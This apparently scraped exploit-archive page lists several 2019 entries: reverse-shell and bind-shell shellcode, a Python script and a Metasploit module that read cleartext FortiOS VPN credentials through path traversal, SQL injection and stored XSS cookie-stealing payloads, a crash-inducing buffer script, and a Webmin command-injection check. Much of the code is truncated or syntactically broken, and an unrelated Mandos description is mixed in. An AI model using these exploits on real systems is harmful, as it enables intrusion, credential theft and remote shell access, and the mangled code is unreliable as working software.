157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.

MD5 | 943dc4bcee3d0b33275bf2fdf8a0cb86

* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g


.global __start

dli $s4, -3
dli $s5, -17
nor $a0,$s4,$zero
nor $a1,$s4,$zero
slti $a2,$zero,-1
li $v0,5040
syscall 0x40404

sw $v0, -32($sp)
lw $a0, -32($sp)

nor $t0,$s4,$zero
sw $t0, -12($sp)
dli $t2,0x5c11
sw $t2,-10($sp)
dli $t1,0x0101017f
sw $t1,-8($sp)
daddiu $a1,$sp,-12
nor $a2,$s5,$zero
dli $v0,5041
syscall 0x40404

nor $a1,$s4,$zero
dli $s0, -1
dli $v0,5032
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop
dli $t0,0x69622f2f
sw $t0,-12($sp)
dli $t1,0x68732f6e
dli $t1,0x68732f6e
sw $t1,-8($sp)
sw $zero,-4($sp)
daddiu $a0,$sp,-12
slti $a1,$zero,-1
slti $a2,$zero,-1
dli $v0,5057
syscall 0x40404
.align 8

unsigned char code[] =

int main(int argc, char ** argv)

printf("Shellcode Length: %dn", strlen(code));

s = code;



129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.

MD5 | 4f69a9a7b34a1231bc105cb3374d328e

; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

global _start

%define pass "pass"
%define port 0x5c11 ; htons(4444)

jmp real_start
password: db pass
pass_len: db $-password

; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned

push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)

push rax
pop rdi

; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned

xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2

; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)

; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned

mov al, 50
xor esi, esi
mov sil, 2

; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned

mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed

push rax

; close(sock)
; __NR_close = 3
; returns zero on success

; closing is not strictly necessary
;mov al, 3

; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor

pop rdi ; "new" was pushed in accept()
push 2
pop rsi

mov al, 33
dec esi
jns dup2_loop

; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned

;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16

xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
repz cmpsb
jne exit

; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh

push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59

;xor eax, eax ; upper bytes are zero after read
mov al, 60


char code[] =

int main() {
printf("length: %lun", strlen(code));
((int(*)()) code)();


FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

MD5 | a022f0e2fde0c635d9836c8aef10e213

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3

def leak(host, port):
print("[!] Leak information...")
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
print("[>] Save to file ....")
return True
return False
except requests.exceptions.ConnectionError:
return False
def is_character_printable(s):
return all((ord(c) = 32) for c in s)

def is_printable(byte):
if is_character_printable(byte):
return byte
return '.'

def read_bytes(host, chunksize=8192):
print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
with open("sslvpn_websession_"+host+".dat", "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
def parse(host):
print("[!] Parsing Information...")
memory_address = 0
ascii_string = ""
for byte in read_bytes(host):
ascii_string = ascii_string + is_printable(byte)
if memory_address%61 == 60:
if ascii_string!=".............................................................":
print ascii_string
ascii_string = ""
memory_address = memory_address + 1

def check(host, port):
print("[!] Check vuln...")
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
return False
return False
def main(host, port):
print("[+] Start exploiting....")
vuln = check(host, port)
print("[+] Target is vulnerable!")
bin_file = leak(host, port)
print("[X] Target not vulnerable.")

if __name__ == "__main__":

if(len(sys.argv) < 3):
print("Use: python {} ip/dns port".format(sys.argv[0]))
host = sys.argv[1]
port = sys.argv[2]
main(host, port)


This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.

MD5 | 956f30465640700e922f5cf3e4a9bdf6

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
'Name' => 'SSL VPN FortiOs - System file leak',
'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
'References' =>
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
'Author' => [ 'lynx (Carlos Vieira)' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
'RPORT' => 443,
'SSL' => true


def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing binary file.......")
if(res && res.code == 404)
print_error("Target not Vulnerable")
print_error("Ow crap, try again...")
def parse()
current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"



YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.

MD5 | 0c5a7e8e6f6f45c7826e5a19a22f0dea

# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:

- Boolean-based blind

- Error-based

- AND/OR time-based blind

The vulnerability was fixed with this commit:


The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.

MD5 | dc129218c58f33b7c68e4cb7a34ecd6a


Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.

MD5 | 7d47b4f46e7a051cb9a4041134f8126a

# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79


# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid]

[Example paylods]

# Example payload: ">
# Example payload: ">alert(document.cookie)

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="title"

Content-Disposition: form-data; name="content"


Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream



Kimai version 2 suffers from a persistent cross site scripting vulnerability.

MD5 | d467918811040b33c88487e63e4fa7b0

# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2

1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create

2-Add this payload "> in the description

3-Save The changes

4-refresh and we have alert pop up!

The Request POC :

POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv

timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= ">&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0


RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.

MD5 | c8006c83d8c82155250a442fd9ef4c2b

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3

# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
buffer = "x41" * 6000

print "[+] Creating %s bytes evil payload.." %len(buffer)
print "[+] File created!"
print "File cannot be created"


Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.

MD5 | d3f8ab6c772881a15aae824b15be9760

# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!


echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
echo '33[0;31mVULNERABLE!33[0m'
echo '33[0;32mOK! (target is not vulnerable)33[0m'